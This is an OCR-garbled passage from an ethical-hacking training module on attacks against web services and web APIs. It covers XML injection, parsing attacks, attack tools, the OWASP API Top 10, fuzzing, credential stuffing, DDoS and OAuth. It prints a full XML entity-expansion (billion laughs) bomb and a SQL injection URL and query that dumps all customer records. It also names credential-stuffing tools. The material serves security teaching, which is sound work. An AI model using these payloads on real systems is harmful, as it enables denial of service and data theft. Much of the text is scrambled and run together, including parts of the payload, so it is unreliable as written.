i n a DoSattack.Attackersuse
to identify
toolssuchas WS-Attacker andexploit WS-addressingspoofing vulnerabilities,
SOAP
Regular
WS
trafic between cleat and server SOAP
Unrequested trac received by
WS
cent

of
WebServiceAttacks:
188: lustation
Figure
XMLInjection
WS-Address
spoofing
attack

applications
Web
sometimesas use XMLto store datasuch user credentials XMLdocuments;
attackerscan parse andview suchdatausingXPATH.XPATHdefinesthe flow the document
suchas theusername andpassword,
andverifiesuser credentials,
in
of
to redirectthemto a specific

user
account.
identify
Attackers the XPATH and insert an XML injectionor XML to bypass
schema the
authenticationprocess andgain unrestrictedaccessto the datastoredin XML.Theprocessby
which attackers enter valuesthat query XML takesadvantage of is an XML injection
attack.

XML inject dataandtagsinto user inputfieldsto manipulate schema

‘Attackers
XMLwith
databases
privileges,
bogus
andgenerate
can beusedto bypass
entries. XML injection
web services DoSattacks.
XML
or
populate
authorization,
escalate

Login
‘count

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Web Attacks
Parsing
Services
Parsing
attacksexploit
vulnerabilitiesandweaknesses capabilities
in the processing of the XML
parserto create a DoS attackor generate logical
errors i n web service requestprocessing. A
parsingattackis performed whenan attackersucceeds i n modifying
a file request
or string, The
attackerchanges the values bysuperimposing
one or more operating system commands via the
request.Parsing
Payloads
Recursive
whenexecutes
.bator
.cmd
is possible the attacker (batch) (command) files.

Theattackerqueriesfor web services with a grammaticallycorrect SOAPdocumentthat

loops,
Contains infiniteprocessing resulting
in exhaustionof the XML parserandCPU

OversizePayloads
Attackerssenda payload that is excessivelylargeto consume all the system
resources,
renderingwebservices inaccessibleto other legitimateusers.

WebServiceAttackTools
=
Soapul
Pro
Source:https://www.soaput.org
SoapUI multiple
Prois a web service testingtool that supports suchas SOAP,
protocols
REST,
HTTP,JMS,AME,andJDBC.An attackercan use thistool to carryout webservice
probing,
SOAPinjection,
XMLinjection,
andweb service parsingattacks.

°

vst

Pope
Sommey
mraren
Esra

14.83;ScreenshotofSoap Pro
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
XMILSpy
Source:https://www.altova.com
Altova XMLSpy
is an XMLeditor and development
environment for modeling,
editing,
transforming,
anddebugging technologies.
XML-related

14.84Screenshot
Figure of xMSpy

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AdditionalWeb Application Tools
Hacking
TB verse
Qoee. sa
expioter

Additional WebApplication Tools

Hacking
Besidesthe web application
hacking
tools describedabove, severalother tools can help
attackersaccomplish
their goals.
Someadditionalwebapplication
hacking
toolsare listedbelow:
+
Metasploit
(https://www.metasploit.com)
*
w3af(http://w3af.org)
=
Nikto(https://cirt.net)
+

Sniper
(hetps://github.com)
\WsSiP(httpsi//github.com)
X Attacker(https://github.com)
timing_attack(https://github.com)
HTTrack (http://www.httrack.com)
SQLInjection Scanner(https://pentest-tools.com)
XSSScanner (https://pentest-tools.com)
SQLExploiter (https://pentest-tools.com)
HTTPRequest (https://pentest-tools.com)
Logger
WebCopier (http://www.
maximumsoft.com)
WPScan (https://wpscan.org)
Instant Source(https://www.blazingtools.com)

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
 ModuleFlow

a
Application
‘Web Concepts
Woo
Applicaton

a
Web
Application API,
Wobhooks,
Threats find
Web
Web

|
Shell

| Application
‘Web Security
7
—
and Web Shell
Web API,Webhooks,
Recentyears havewitnessedan exponential increase i n the usageof webAPIsi n application
development. WebAPIshelpdevelopers i n building webapplications that retrieve data from
multipleonline sources. AswebAPIsare incorporated i n many popularapplications suchas
socialnetworking, shopping,andsearchengines,the importance of securingAPIsandtheir
integrityhasincreased.Anysecurity breachi n an API can expose personal or business-critical
datato attackers. Thissectiondiscusses
the basicconcepts of webAPI,webhooks, and web
shell;
APIvulnerabilitiesandhackingtechniques; andthe bestpractices forAPIsecurity.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is WebAPI?

te ping dat om multigene sources

(@ Using
cenralied
webhe and
gia
one
Dasiness increases
updating
and
changing
the
APreduces complety
central
lation
the tery of dts or

mu)

23 Bus
a
What is Web API?
API is an application
‘Web programminginterface
that providesonlineweb services to client:
sideapplications and updating
for retrieving datafrom multipleonline sources. It is a special
typeofinterfacewhereinteractionsbetweenapplications
can beallowed through the Internet,
protocols.
andsome web-based on the Internet and they
WebAPIsmakeresources accessible
are generally via the HTTP protocol.
accessed Theyalsoconsist of differenttypesof tools,
functions,and protocols
that can be used to develop
softwareor applications
without any
complexity.
For example,
consider that is supported
a traditionalweb application bymultiple
mobile
platformswith no centralizedAPI.Thisresultsi n the complexity of updating logicfor
business
eachindividualimplementation whenever thereis an update
centralizedweb API reducesthe complexity
i n the
client
applications
Using
and increases the integrityof updating
and
a

changing
the
data logic
at
or
one
central
business location

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
14.85:
of
lustration
WebAPL
 WebServicesAPIs

HST Ani
which
ae aka now ac ETE re eign ang ES pes and TP

Web Service APIs

Themost frequently
usedwebservice APIsare listedbelow:
=
SOAPAPI: SOAPis a web-based communication protocol that enablesinteractions
betweenapplications
runningon different platforms suchas Windows, macOS, Linux,
SOAP-based
etc,,via XMLandHTTP. APIsare programmed recover, modify,
to generate,
anderase differentlogs
suchas profiles,
credentials,
andbusiness
leads.
REST (Representation State Transfer) API: REST is not a specification, tool, or
framework; it is an architecturalstyleof web service that serves as a communication
mediumbetweenvarious systems on the web.APIssupported bythe RESTarchitectural
styleare known as RESTAPIs.SuchAPI-basedcomputersystems, web services, and
databasesystems allow requesting machinesto receive promptaccess and redefine
web resource representations byproviding a set of statelessprotocols and qualitative
operations.
RESTful
API: RESTful service that is designed
API is a RESTful usingRESTprinciples and
HTTPcommunication protocols, RESTful is a collectionof resources that use HTTP
methodssuchas PUT,POST, GET,and DELETE.RESTful API is also designedto make
applicationsindependent to improvethe overall performance, visibility,
scalability,
reliability,
andportability
of an application.

APIs
with
©
following
the
Stateless:
featurescan be referred to asto RESTful APIs:
Theclientend stores the state of the session;the server is restrictedto
save dataduringthe requestprocessing
(representations)
Cacheable:Theclient shouldsave responses i n the cache.This
featurecan enhanceAPIperformance
204 tical andCountermensores
Making by Comet
Copyright©
 Environment:Boththeclientandthe server shouldbeindependent
Client-server of
eachotherbecause the server handlesbackendoperations
andthe clientis the front
endfromwhererequests are made
UniformInterface:
Resources must be specifically
andindependentlyrecognized via
a single
URL byemploying basicprotocol
methodssuchas PUT,POST, GET,and
DELETE,to a
Layered
andit shouldbe possiblemodifyresource
System:
Multiple-layer
architectureallowsintermediaryservers to supply
sharedmemory(cache)
to achievescalabilitybecausethe clientsystem directly
never notifiesthe main server of its connectivity,
‘Code
on Demand:
An
optional
featurewherethe server can alsoprovide
codeto the client,through
executable
customized
whichthe client’s
temporary
functionality
can be

XML-RPC: Extensible
communication protocol
uses proprietary
Markup
that usesa -
LanguageRemote ProcedureCall (XML-RPC)
specific XMLformatto transfer
XML to transferdata.It is simpler
is a
data,whereasSOAP
thanSOAPand uses lessbandwidth
to transfer
data,
JSON-RPC: JavaScriptObjectNotation RemoteProcedureCall (ISON-RPC]
-
is a
protocol
‘communication that serves i n the same way as XML-RPCbut uses the JSON
formatinsteadof XMLto transferdata.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What are Webhooks?

©Webhooks arewer definedHTTP ‘Operation

ofWebhooks
callback A P that ae ised

riggre
or push
basedon events suchas wes

Webhooks
allow
applations
otherapplications
update with
to

thedomainregistration
va wser
Interface
or API inform cents
shouttheoccurence ofane

‘What
are Webhooks?

Webhooks are user-defined

HTTP callbackor push APlsthat are raisedbasedon events
triggered,suchas comment receivedon a postand pushingcodeto the registry.Awebhook
allowsa n application
to update
otherapplications
withthelatestinformation.Onceinvoked,
it
supplies
data to the other applications,
which means that users instantly
receive real-time
information.
Webhooks
are sometimes called“Reverse a s they
APIs― provide
what is required
forAPIspecification,
andthe developer
shouldcreate an APIto usea webhook.
Awebhookis an APIconcept that is alsousedto sendtext messagesandnotificationsto mobile
numbersor emailaddressesfrom an application whena specific event is triggered. For
instance,if you searchfor something i n the online store andthe requireditem is out of stock,

on
you click the “Notify
for purchase.
me―
toan
bar get alertfromtheapplication
Thesenotificationsfromthe applications are usually
whenthat item is available
sent throughwebhooks.
Operation
of Webhooks
Webhooksare enrolledalong
with the domainregistration
via the user interfaceor API to
Informthe clientsabout a new event occurrence. The generated pathcontains the required
codethat automatically
executes on the new event accurrence. Here,systems neednot know
whatshouldbe run; theyjust need trace
‘Awebhookis a powerful
tool because
to the
pathto generate
everything
notifications.
remains isolatedon the web.Asshowni n the
figure below,when system-2 getsa notification
message fromtheselected pathofthe domain,
it not onlybecomes aware of new event occurrences on othermachines but also responds to
them. The pathcontains the codethat can be accessed via an HTTP POSTrequest. It also
informsthe user aboutfromwherethe message hasbeentriggered, includingits dateandtime
andotherdetailsrelatedto the event. Webhooks c an be privateor public

ical andCountermensores
Mackin ©by E-Comel
Copyright
 System-1
web/TtP System-2

cl

ofwebhooks
18.86:Operation
Figure
‘Webhooks
vs. APIs

=
Webhooks fromwebsitesto the server. APIsare usedfor
are automatedmessages
server-to-website
communication.
Webhooks
only
getreportsor notificationsvia HTTPPOST
of the dataupdates.
APIsmakecallsirrespective
whena new update
is made.

Webhooksupdate
applications
or services with real-timeinformation.API needs

Webhooks
toperform activity.
implementations
additional this
havelesscontrolover dataflow.APIshaveeasycontrolover dataflow.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OWASP
Top10APISecurity
Risks

OWASPTop10API SecurityRisks
Source:https://www.owasp.org
According the following
to OWASP, are the top 10APIsecurity
risks:
API
Risks Description
exposethe endpoints
‘APIs handling objectidentifiers,
andthe
BrokenObject server componentdoesnot tracktheclientsstateproperly,

Level
Authorization
in amassive attack
resulting surface
Allowsthe attackerto modify
levelaccess controlflaw
the object's
unauthorizedaccess to the datasource
IDvalueand obtain,

BrokenUser
‘Vulnerabilities
in authentication

captureauthentication
can easily
‘Attackers
mechanisms
allow
attackers
tokensandstealuser identities
compromisethe APIsecurity
using
to

Authentication tokensandexploiting
‘authentication
Pls are vulnerable
implementation
to authentication
attacks
flaws
suchas credential
stuffing
andbrute-forcing

While
designing
API, expose
tothe
Excessive
clients
Data properties
the the developers
may
without considering
allthe object
their individual

Exposure anddepend
sensitivity
Allowsattackers
on the clientsfor filtering
to retrieve more information
data
thanrequested
Lackof avoid enforcing
‘APIs restrictionson the numberof resources
Resources
and requested bythe client
RateLimiting Allowattackersto consume alltheavailable resources,resulting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 unavailability
i n service to legitimateusers,causingDoS
Mayincludeauthenticationflawsthatcan beexploited
to
perform
brute-force
attacks
‘Complexity
i n access controlpolices
through
different
BrokenFunction hierarchies,
groups,and rolesbetweenadministrativeand regular
Level functionscan cause authorizationerrors
Authorization Allowattackers
to gain unauthorized
access to administrative
functions
or users’
resources

APIsaccidentally
exposetheinternalvariablesor objectsdue to
Mass improperbinding
andfiltering
basedon a whitelist
Assignment Allow
attackers modify
properties
withunauthorizedaccess to the object,

‘Security
misconfigurations
includevulnerabilitiessuchas insecure
defaultconfigurations,
ad-hocconfigurations,
opencloud
Security storage, HTTPheaders,
misconfigured permissivecross-origin
Misconfigurationresource sharing andmissingTLS/SSL.
(CORS),
Allowattackersto perform
system security
and compromise
various attacks
the
Sending untrusted mayresulti n
dataas queriesto the interpreter
injectionflaws,
suchas SQL, LDAP,XML,and command injection,
Injection Allowattackersto trickthe interpreterbysendingdatato
maliciouscommandsand gain unauthorizedaccess
‘execute

Improper
assetmanagement
occurs due to a lackof version
Improper
Assets
Management API older
controlfor
versions
of
hierarchies,and
that can be exploited
‘vulnerabilities
of APIconsists
bythe attacker

Insufficient
logging
system
along
Lackof proper
ineffective
vulnerable
andmonitoring with missingor
withincidentresponsecan makethe
integration
Logging and
Monitoring Allowto
‘and themaintain
systems persistenc
attackerscompromisesystem,
pivotto other
or destroydata
andnetworksto extract,tamperwith,

14.3: Risks
OWASPTop10.APSecurity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 APIVulnerabilities

fe oe! =

ModernwebapplicationsandSaaSplatforms use APIsdueto their extensive features,andmost

mainly
of the APIsecurity focuseso n technicalaspects.
Poormanagement of API permissions,
logic,
flawsi n business and exposureof applicationlogic
and sensitivedata suchas personally
identifiableinformation(Pll)drastically increase the attacksurfaceand pave the way for
attackers to perform
to targetthesevulnerabilities manyattacks suchas DoSandcodeinjection
attack.
Somecommon APIvulnerabilitiesare listedbelow:

Vulnerabilities vulnerability,
flawscan cause serious
Design
Description
disclosing
information
Enumerated
Resources
through
the
public
unauthenticated API
Allowattackersto guessuser IDseasily,
of the user data
compromisingsecurity

[APIreturns URLsto hypermedia

resources suchas image,audio,or

|*video
files to that are vulnerablehotlinking
Sharing
Resources
via Thiscan cause severalproblems
suchas poor analyticsand strains
Unsigned
URLs andcan be usedbyattackersfor exploitation
(on resources,

Signed URLsc an beusedto implement policies

suchas rate

limiting, Developers
andscoped
auto expiration,
use third-party
softwarelicenses
sharing
softwarelibrarieshaving
open-source
‘Vulnerabilities
in

|+
Third-Party
Libraries Avoiding
regular
updates
laws
security
‘many
and relegating fixescan resulti n
security

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CCross-origin (CORS)
resource sharing thatenables
is a mechanism

cors
Useof
Improper implementations to
thewebbrowser perform cross-domain requests;
of CORScan cause unintentional
Usingthe “Access-Contral-Allow-Origin―
improper
flaws
headerfor allowing
all
ofiginson privateAPIscan leadto hotlinking
Ifthe inputis not sanitized,
attackersmayuse codeinjection
techniques suchas SALandXSSto addmaliciousSQL statements
Codeinjections fr codeto theinputfieldso n theAPI
Allowattackersto stealcriticalinformationsuchas session cookies
and user credentials.
Privilege
escalationis acommon vulnerability i n APIs
present
RBACPrivilege role-based
hhaving access control
(RBAC)wherechanges to
Escalation
are proper
endpoints madewithout
Allowattackers
attention
to gain access to users’
sensitiveinformation
No proper attribute-basedaccess control(ABAC)validationallows
No ABACValidation attackersto gain unauthorizedaccess to APIobjects
or perform
actionssuchas viewing,updating, or deleting

Logic
Business Flaws Many APIscome withvulnerabilities
exploit
Allowattackersto
purposes
legitimateworkflows
logic
in business

for malicious

APITable164: vlnerbities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebAPIHacking
Methodology
(©Web-based
APisare
u sed

APIs
more
user
fiendly,
heterogeneous
for supporting devices
suchas mobile
developers
a ndloT
devices,
ontheaspect
these
(©Tommake
theseweb-based are compromising of.
thereby making web-basedservices vulnerable
to varous attack

identi
toto@ —
© vvee sey sandrds

Web API Hacking

Methodology
Recentyearshavewitnessedtremendous growth i n the usageofweb-based APIsforsupporting
heterogeneousdevicessuchas mobiledevicesand loT devices.Thesedevicesfrequently
communicate with backend web servers via APIs.To maketheseweb-based APIs more user:
friendly,
developers are taking
shortcutsto security, makingonlineweb services vulnerableto
various attacks. usevarious techniques
Attackers to identify
andexploit
vulnerabilities
i n these
APls.To hackan API,attackersneedto identify
the API technologies, standards,
security and
attacksurfacefor exploitation.

+
Identify
aweb the
Hacking APIinvolvesfollowing
the target
phases:
Detect

=
security
Identify
standards
the attacksurface
=
Launchattacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the Target
Identify
ure regu

Message
Formats

manipulate
Caneasiy

message
enti
the,
| einen. srt

Identifythe Target
hacking
Before an attackerfirstneedsto identify
an API, thetargetandits perimeter:
HTTP:APIssuchas SOAP
‘=
andREST mostly HTTPprotocol
use the for communicating
API-
basedmessages. The HTTP protocol is a text-basedprotocol
where the header
information format.Forexample,
i s transmittedin a readable considerthe following
HTTPRequest andResponse headers:
HTTPRequest

Ht /doc/tant. eal #770/

Rocwpetinagergit
decoptatncediog:
gzip,
tnage
Spon
deflate
Request
Messee
=>
eeuest
H eaderandBody
Blanklineseparating
bockrasTe00¢eauthor=Ra
TPE ese oy

14.87;
Figure
of
ExampleHTTP header
Request

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HTTPResponse

7200on > statestine

ons tontedas
wot-nangeetbytes,
response
Wenders |_
Response
p> Matis

=> bankine separating andBody

Header
<b1> My Hone page</mi>
+ Message
Response Body

shownin
‘As the figure,
14.8;
Figure
both HTTP Request
ofResponse
Example
HTTP

and Responseheaders
header

are transmittedi n
plaintext;
an attackerc an easily
manipulate
theseheadersto identify
the target.
‘Message
Formats:TheAPI messagestransmittedover the webwill take some format
suchas JSONforREST
API andXMLforSOAP are usedincorrectly,
API. If theseformats
theycan pave the way for vulnerabilities.Astheseformatsare easyto understand,
an
attackercan easily
manipulate encoded
messages to identify
i n theseformats thetarget
andits perimeter.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DetectSecurity
Standards

|@ 20% such9 SOAPandRESTimplement erent authentication

a uthorization
standardssuchas OpeniO
Connect,SAMI,OAuthLand 2%,and WSSecuty

Inegry transport
though
signature
|G SSLprovides evel secutyfor AP message oensure
though
confidentiality encryption and

|G inmost oftheAPs,SLs usedto encrypt

onlysenitve user datasuch
ae cre carddetails,
thereby
otherinformation
leaving i plitent

|@ these
standardsecurity
standards
configured
impropery,
can in
are
forfortheexploitation
an attacker ier vulerailties these

Detect Security
Standards
Although
APIsclaimto besecureas they
incorporate standards
security suchas OAuthandSSL,
theystill includemanyvulnerabilitiesthat can beexploited byattackers.
=
APIs such as SOAPand RESTimplement different authentication/authorization
standards suchasOpenID Connect, SAML, OAuth1.Xand2.X,andWS-Security.
SSLprovides transport-levelsecurity for API messagesto ensure confidentiality
through
encryption through
and integrity signature.Although SSLis usedfor security,
i n most API
messages, onlysensitive user data suchas creditcarddetailsare encrypted, leaving
otherinformationi n plaintext.
If thesesecurity
standards are configured
improperly, an attackercan identifyvulnerabilities
in
thesestandardsfor further exploitation.
For example, an attackercan capture and reuse a
sessiontokento retrieve a legitimate
user'saccount informationthat is not encrypted.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the AttackSurface
Identify
API
Metadata
Vulnerabilities PresserDet

Sd communion
corde between the
A
fromtherecords
a ie

Identifythe Attack Surface

Afteridentifying implementations,
thetargetAPI to attackandits security an attacker
needs
to
identify
the attacksurfacefor launching
the attack.It is very easyto find an attacksurfacefor
Ubbasedapplications,
as we can see various input fieldso n the web pages.However,
identifying
the attacksurfacefor an API is different as there are no built-in UI fields;
we can
onlysee an API endpoint.
To identify
an attack
surface
of a n API,attackers
needto understand
theAPI'sendpoints, andbehavior.
parameters,
messages,
Usethe following
techniques
to identify
theattacksurface the
API Metadata Vulnerabilities: API metadatarevealsa
of large
targetAPI:
amount of technical
information
suchas paths,parameters,and messageformats, which is useful for
performing
an attack.REST
API uses metadataformatssuchas Swagger, RAML,API
and /0 Docs,
Blueprint, whileSOAPAPI uses WSDL/XML-Schema,etc. For example,
considerthe following of Swagger
codesnippet that revealstechnicalinformation,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Definition
Swagger

watnoa: “bauer
summary: "Delet
metrods
anaes
cerety?
type: “void

buthoriestions nd vated comecty?

=
oauth2: (
(

,
1
paraneters
Is
acesAve
ated? 105

description
required: true,
5d

to deere

type: "string
paranType: "path
Sllownitiple: false
Ora
snuliple? none a?

1489: Example
Figure definion
of swagger

Attackerscan exploit
vulnerabilities
i n these definitionsto perform
various attackson
APIs,
API Discovery: If an API does not have metadata, attackersmonitor and recordthe
communication betweenthe API and an existingclientto identify the initialattack
surface.For example, an attackermay use a mobile app that uses targetthe API,
configure a localproxyfor recording traffic,and finally
configure
the mobiledeviceto
use this proxy to accessthe API.Then, the attackerusesautomatedtoolsto generate
metadatafromthe recordedtraffic.
Brute Force:if none of the abovementioned techniques works, the attackerstry to
identify
the API paths,
arguments, etc.,through brute-forcing. Common API paths used
bydevelopers include api, /api/v2,/apis.json,etc. Furthermore, some APIs such as
hypermedia allow retrieving links and parameters related to an API response.This
informationhelpsattackersto identifythe attacksurface.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LaunchAttacks EH
on Login/credenta Attacks
Stuffing

EBsic pet ants ALOD0Sattacks

Maliousinputattacks ‘uthorzation
Attackon APL

S SLConfiguration
Inaecute User Spooting

InsecureDirect References
Object (1008)
Middle
Attacks
‘Man-in-the-

Sesion/Ruthentiaton
Insecure Handing
Replay
Attacks
Session

ED socal
encnesing
Fuzzing
andInvalid InputAttacks

Fuzzing
‘tacks
use thefuzing
to
techniquerepetealysendrandom
inputtothe target
APIt o generate
error

fran, attackers
T eperform
combination
of inputparameters usesepts
that
automated
to achieve the goal
send a huge
numberofequests with a varying

Invalid InputAttacks
tacks
wilinvalid
to
eve
thea inputs APIsuch endingten
of
place ombers, ombersin
place
of

tackersalso theHTTP
manipulate h eaders
andvalues bothAP logica ndHTTP
targeting protocol

Module4 1918
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
MaliciousInputAttacks
CEH
Malicious
Attacks Input —————
XML
Bomb
Code Attack

rtackers
bothan
target ||
injectmaliousinput decty
APLandts hating
to
SECT Ste

thisatack,
attackers
‘perform
rmatious pases singXML
message
use cae
* * rn *

|sbymalicious
seit
‘pt offs,
uploading
uploading
shel
example
document
crt instead
for
ETL
io oe

apatites
etait

ates

‘This themaisous
mayresult in executing

Script
bypass
the
security
to
on mechanisms

Attacks
Injection

noveainramremnrasnry
seo anne han bn

ietetnneane
information
ta perform
other mailous acts on the databaseserver

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InsecureConfigurations
Exploiting

Login/Credential
Stuffing
Attacks
(©
Atackers
{©Credentialemploy
attacks
login
suingattacks
or redentilstufingatacs
donot perform
to explopassword

guesingor rute-forlng
pasword
tte stomata the ener ented pats ofeden sng avomoted
reuse across

of passwords ste
o sesuchas eny
—
mult

MBA,an
SNIPRbreak
to i ntoan account
 APIDDoSAttacks

Se. anata te,

——-

&&
o a cam

AuthorizationAttackson API:OAuthAttacks
°
=

(©
OAutnsan authorization
prota tat lows a se imitedaccess tothe resources
to grant on ate to

Ofuth Atacks

(aT
LaunchAttacks ell
Afteridentifying
the targetAPI,analyzing formatsand security
the message standards,
and
identifying attackersperform
the attack surface, various attackson the targetAPI to steal
sensitive information
suchas creditcarddetailsandcredentials,

Module4 1924
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 performed
Variousattacks on APIsare discussed
below:
=
Fuzzing
Attackersuse the fuzzing
technique
to repeatedly
sendsome randominputto the target
API to generate To perform
that revealcriticalinformation.
error messages fuzzing,
attackers use automated scriptsthat send numerous requestswith varying
combinations of inputparameters.Attackersuse toolssuchas Fuzzapi
to perform

on
theAPI
fuzzing target
Invalid InputAttacks
In some scenarios,fuzzing is difficult to perform due to its structure. In suchcases,
attackerswill give invalid inputsto the API,suchas sending text i n placeof numbers,
sending numbersi n placeof text, sending a greater numberof charactersthan
expected, and sending null characters, etc., to extract sensitive informationfrom
unexpected systembehaviorand error messages. At the same time, attackersalso
manipulate the HTTPheaders andvaluestargeting bothAPIlogic andtheHTTPprotocol
InputAttacks
‘Malicious
above,
In the attack discussed attackerstry to retrieve sensitive informationfrom
unexpected systembehavioror error messages. A more dangerous attackis wherethe
attackersinjectmaliciousinput directly to target both the API and its hosting
To perform
infrastructure, attackers
this attack, malicious
employ message
parsersusing
XML.
Thefollowing
codesnippetillustratesa n XML bombattack:
<?xml version="1.0" encoding="utf-8"7>
<!DOCTYPElolz [
<!ENTITY lol "1o1">
<!ENTITY loli
{ENTITY 1012 €lol;
"Glol; £101;
6101; s1o1;E101; £101;
4101;61ol; lol ;">

<!ENTITY «1011;
“gloll ;élo11;61o11;élo11;
1013
1011; E1011; élol1;slol1 ;elol1;">

1012 ;

<!ENTITY 1ol4 61012;

£1012;
61012; 61012; £1012;£1012;
61012;«L012;
61012; ">

"glol3
<!ENTITY
;€1013;
61013;
1015
41013; 41013 £1013;
; £1013;41013; 41013 ;¢1013;">

"glo14
;
<!ENTITY 1016 61014;
61014;61014; 61014;61014 ;€1014;
£1014; Glol4 61014; ">

“eloLS
<!ENTITY
;€1015;
61015;
1017
4lo1§;4lol5 ; £1015;61015; Elol5 ;¢lo15;">
£1015;

<!ENTITY 1018 61016;

61016;
"E1016; 1016; 61016; 61016; 61016; £1016;

"gloL7 61017;61017; 61017; 41017 £1017;

;
£1016;

£1017;61017; E1017 61017;">

;
ELo16;

;
">

Module4 1922
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
<!ENTITY 1019

> ;
"eloL8 61018;61018; 41018 ;¢1o18£1018;
;
£1018;
E1018;E1018; ¢lo18;">

<1o12>61019 ;</lolz>
Whenthe abovementioned codeis processed bya vulnerableor misconfigured
XML
parser,i t will try to expand
the lol9 entity,resulting
i n a memory-out-of-bound
error.
Thiseither brings
the targetserver totallydown or makesit vulnerableto further
attacks
Anotherway in whichattackersperform thisattackis byuploading maliciousscriptfiles,
shell of
e.g, byuploading scriptinsteadthe pdfdocument.
the maliciousscriptto bypass
scriptto otherparties
the securitymechanisms
Thismayresulti n executing
o n the server or propagating
who are tryingto accessthe API. Using this technique
the
attackers,
tryto extract informationrelatedto the underlying
filesystem.
Injection
Attacks
Similarto traditionalweb applications,
APIs are alsovulnerableto various injection
attacks.Forexample, considerthe following
normalURL:
http: //billpay.com/api/vi/cust/459
For the abovementioned
URL,the API retrievesthe customer detailsbasedon the
SQLquery:
ID459fromthedatabaseusing the following
‘customer
*
“SELECTFROMCustomers where custID='― custID +
―
+

Here,
is with
thecustiD replaced 459
custID="
* FROM
“SELECT
459°―
Customers where
In the abovementioned
URL,assume that an attackerinjects
the maliciousinput
http: //billpay.com/api/vi/cust/ "8200r%20'1

SQL
*is
Theresultantmalicious query
“SELECTFROMCustomers where custID="’or ‘1
Theabovementioned query returns detailsof all the customers in the database. Using
an attackermay further deleteor modify
this information, the data i n the databaseor
use thecustomers’
information to perform othermaliciousactivities on the database

TheseAPI injectionattacksare performed not onlyusingSQLbut also usingJSON,

XPath,
JavaScript, XSLT,etc.,whichrequireparsers/processors
forexecution,
attacks,
Note:Similarto injection webAPIsare alsovulnerableto XSSandCSRF attacks
Exploiting
Insecure Configurations
© Insecure SSLConfiguration:
to perform
Vulnerabilitiesi n SSLconfiguration
MITM attacks.Forexample,usingself-signed may
allow
SSLcertificatesfor secure
attackers

‘API to perform
access may allowattackers a n MITM attack.An attackermay
sniff
the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 trafficbetweenan APIanda client,manipulate andstart
the client-sidecertificate,
or manipulating
‘monitoring the encrypted
trafficbetweenthe clientandtheAPI,
Insecure DirectObject (IDOR):
References In general,
directobject
referencesa re
Usedas arguments for
API
calls,andaccessrights
API metadataand exploited
not
a re imposed o n the objects

byattackersto identifythe parameters

for
whicha user doesnot have access. These vulnerabilitiescan be identifiedthrough
and try all
possiblevaluesfor the parameters to access the data to whichthe user doesnot
haveaccess.
InsecureSession/Authentication Handling:
Vulnerabilitiessuchas the reuse of
session tokens,sequential longsession token timeout,unencrypted
session tokens,
sessiontoken,andsessiontokenembeddedinto a URL, allowattackersto hijack
and
take over the client session and steal or manipulate the messages betweenthe
clientandtheAPI
Login/Credential Stuffing
Attacks
Attackersoften targetlogin and validating
systemsbecauseattackson thesesystems
are difficultto detectandstopusingtypical solutions.Attackers
API security perform
loginattacksor credentialstuffingattacksto exploitpassword reuse across multiple
platforms. Most users use the same passwords to access differentweb services.
can take advantage
‘Attackers of credentialsstolenfrom one account and use them to
validateotherservices.
Credentialstuffing attacksdo not involve password guessingor brute-forcing the
passwords; instead, attackerstry to automate all the previouslyidentified pairs of
credentialsusingautomated toolssuchas Sentry MBA,SNIPR, Phantomls,to breakinto
a n account. Theseattackscan also be performed to disruptAPI-basedservices by
preventing valid users fromsigning in, thereby degrading the user experienceand
functionality
Attackersgenerally
front-facing
of the
APIs.
employ botsfor differentloginattemptsusingthe previously stolen
data (collectedfrompreviouslogins) or leakedinformation belongingto one account to
breachother accounts/services or bombardthe server with a largeset of loginrequests
until the rightcombination hits.Oncetheattackis successful, attackers not onlytake
controlof the user account but alsoperform illegitimate
transactions fromthe account
andconductfraudulent
online
campaigns.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cobection
f Stl
Credentials
web
Services
Figure14.90:
Hlustration
ofcredential
stffing attack

‘APL
DDoSAttacks
The DDoSattack involvessaturating
a n API with a massive volumeof traffic from
multiple (botnet)
infectedcomputers to delay
the API services to legitimate
users.
Although
many rate limit constraints are implemented
to protectthe server against
crashing,
theymaynot preventthe service delay
(API
response),
thereby
degrading
the
API's
user experience,
Attackersoften carry out theseattacksusingbotnetsthat are createdto discoverand
staywithintheAPIrate limitcontrolto increase the possibility
ofan attack.Alongwith
the regular
trafficfrom legitimate
users,attackers’ can alsobypass
requests APIsecurity
management systems, loadbalancers, implementations.
andother security
Most of these attacksmay not be volumetric,Theymay also exploitcertain API
vulnerabilitiesto disruptthe API services. For instance,
an attackerwho gainsaccess to

the memory
resources
reserved
theAPIcan consume CPUandother
the service for as long for
as possible.
theAPIto delay

Figure
of
14.91:l usration APIDDeSattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Authorization
Attackso n API:OAuthAttacks
According to https://auth0.com,
OAuthis an authorizationprotocolthat allowsa user to
resources on one site to anothersite without having
grantlimitedaccess to his/her to
expose
his/her
credentials. devicesand applications,
Auth grantsauthorizationflowsfor many computing suchas
applications
users to different
connecting fromone application
to accessthe required
information.
Differentactors involvedi n the OAuthprocess:
> Ownerof the resource: The resource owner is alsoknownas a user who grants
permission to accesshis/her
to an application
suchas providing
is limitedor conditional, account.
access
The to the application
onlyreadandwrite permissions.
Server(API):
‘Authorization/Resource Theresource server provides
the secureduser
andthe authorizationserver validatesthe user identity
account, andthen supplies
the accesstokento theapplication.
Clientor Application: that seeksaccessto the user account. To
It is an application
the user must authorizethe application;
access the account, then,the AP!should
validatetheauthorization.
Steps
